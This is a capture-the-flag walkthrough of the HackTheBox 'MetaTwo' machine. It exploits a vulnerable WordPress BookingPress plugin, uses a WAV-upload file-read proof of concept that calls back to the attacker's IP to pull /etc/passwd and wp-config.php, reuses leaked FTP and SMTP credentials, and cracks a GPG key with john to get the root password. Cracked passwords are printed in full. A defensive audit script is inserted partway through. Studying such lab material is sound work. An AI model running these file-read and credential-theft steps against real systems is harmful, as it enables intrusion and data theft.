PORT   STATE SERVICE VERSION
21/tcp open  ftp?
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
|   256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_  256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open  http    nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/


I ran a WordPress scan but didn't find anything interesting other than the users "admin" and "manager".

The website is running WordPress 5.6.2. The site also has an events page, which uses a vulnerable version (1.0.10) of the BookingPress plugin.

http://metapress.htb/events/


There were two CVEs I found. One was built for this box, but I wanted to do it on my own, so we used https://github.com/destr4ct/CVE-2022-0739/blob/main/README.md

This Python script requires a URL and a "nonce", which I assume is like a cookie, which is why my previous scripts failed. We find the nonce in the source code of the website's events page.


Nonce = d97102a77b


This allows us to dump the password hashes for admin and manager:


|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70


The manager hash cracks to partylikearockstar.


Using a PoC, we can read files from the server by uploading malicious .wav files, which trigger a callback to our machine:

python3 PoC.py  -l 10.10.14.20 -p 1337 -f /etc/passwd


Download decode.php and feed the base64 string from the callback into the decode script to recover the file contents.


The user is jnelson.

I wasted a ton of time trying to find the wp-config.php file. HTB gave me a hint saying it was wp_config.php, but it doesn't have an underscore, so nothing worked. I had to eventually cheat after hours of trying different locations.

python3 PoC.py  -l 10.10.14.20 -p 1338 -f ../wp-config.php

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

We can then log in to the FTP server with those credentials.


We find a send_email.php file containing a login for jnelson:

$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";

We can then SSH in using those credentials.


The MySQL login works, but there is nothing interesting in the database.

╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 www-data www-data 2032 Jun 23  2022 /var/www/metapress.htb/blog/wp-config.php
define( 'DB_NAME', 'blog' );
define( 'DB_USER', 'blog' );
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );
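Every credential used in this chain came from a config file: plaintext FTP credentials and FS_METHOD=ftpext in wp-config.php, an SMTP password in send_email.php, and a world-readable wp-config.php that handed the database password to an unrelated local user. The audit below is an added example written for this writeup, not the box's or the PoC author's code; it scans PHP sources for the two credential patterns seen on this box, flags FTP-based filesystem access and FTP without TLS, and checks an `ls -l` line for world-readable config files. The sample file contents and the `PLACEHOLDER_*` values are constructed for the example and are not the box's real secrets.

```python
import re
from dataclasses import dataclass

# WordPress constants whose values are secrets. The list is an assumption for
# this example; extend it for your own installation.
SECRET_DEFINES = ("DB_PASSWORD", "FTP_PASS", "AUTH_KEY", "SECURE_AUTH_KEY")

# define( 'NAME', 'value' ) or define( 'NAME', false ) as written in wp-config.php
DEFINE_RE = re.compile(
    r'''define\(\s*['"](?P<name>[A-Z_]+)['"]\s*,\s*'''
    r'''(?P<value>'[^']*'|"[^"]*"|(?i:true|false)|\d+)\s*\)'''
)
# $mail->Password = "..." as seen in send_email.php (PHPMailer style)
PROP_RE = re.compile(r'''\$\w+->(?P<name>Password|Username)\s*=\s*['"](?P<value>[^'"]*)['"]''')
# One line of `ls -l` output: mode, links, owner, group, size, date, path
LS_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\d+\s+(?:\d{4}|\d\d:\d\d)\s+(?P<path>\S+)$"
)


@dataclass
class Finding:
    path: str
    kind: str
    detail: str


def find_hardcoded_secrets(path, source):
    """Return findings for secrets and risky filesystem settings in a PHP source string."""
    findings = []
    for m in DEFINE_RE.finditer(source):
        name = m.group("name")
        value = m.group("value").strip("'\"")
        if name in SECRET_DEFINES and value:
            findings.append(Finding(path, "hardcoded-secret", f"{name} is set in source"))
        elif name == "FS_METHOD" and value == "ftpext":
            findings.append(Finding(path, "ftp-filesystem",
                                    "FS_METHOD=ftpext stores FTP credentials in this file"))
        elif name == "FTP_SSL" and value.lower() == "false":
            findings.append(Finding(path, "ftp-no-tls", "FTP_SSL is false: credentials travel in clear"))
    for m in PROP_RE.finditer(source):
        if m.group("name") == "Password" and m.group("value"):
            findings.append(Finding(path, "hardcoded-secret", "mailer password is set in source"))
    return findings


def check_config_mode(ls_line):
    """Flag a config file whose mode grants read access to 'other' (e.g. -rw-r--r--)."""
    m = LS_RE.match(ls_line.strip())
    if not m:
        return None
    mode, path = m.group("mode"), m.group("path")
    if mode[7] == "r":  # index 7 is the 'other' read bit
        return Finding(path, "world-readable",
                       f"{mode} lets any local user read {path}; use 0640 owned by the web user")
    return None


# Constructed sample input mirroring the shape of the files found on the box.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'blog' );
define( 'DB_USER', 'blog' );
define( 'DB_PASSWORD', 'PLACEHOLDER_DB_PASSWORD' );
define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', 'PLACEHOLDER_FTP_PASSWORD' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_SSL', false );
"""
SAMPLE_SEND_EMAIL = """<?php
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "PLACEHOLDER_SMTP_PASSWORD";
"""
SAMPLE_LS = "-rw-r--r-- 1 www-data www-data 2032 Jun 23  2022 /var/www/metapress.htb/blog/wp-config.php"


def audit_wordpress_install():
    """Run all checks over the constructed samples and return every finding."""
    findings = find_hardcoded_secrets("wp-config.php", SAMPLE_WP_CONFIG)
    findings += find_hardcoded_secrets("send_email.php", SAMPLE_SEND_EMAIL)
    mode_finding = check_config_mode(SAMPLE_LS)
    if mode_finding:
        findings.append(mode_finding)
    return findings


if __name__ == "__main__":
    for f in audit_wordpress_install():
        print(f"[{f.kind}] {f.path}: {f.detail}")
```

The fix for each finding is the one the box demonstrates by omission: keep wp-config.php at mode 0640 owned by the web server user, drop FS_METHOD=ftpext (or at minimum set FTP_SSL to true), and move mailer and database passwords into environment variables or a secrets store rather than PHP source that any file-read bug can expose.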

In the keypass directory there is a hidden .keys file.

We can grab the GPG private key from it, convert it to a hash with gpg2john, and crack it with john:


gpg2john hash.gpg > super1.txt

john super1.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=gpg
The hash cracks to blink182.


Now, with that passphrase, we can have passpie print the stored root password and su to root:

passpie copy ssh --to stdout

The root password is p7qfAZt4_A1xo_0x.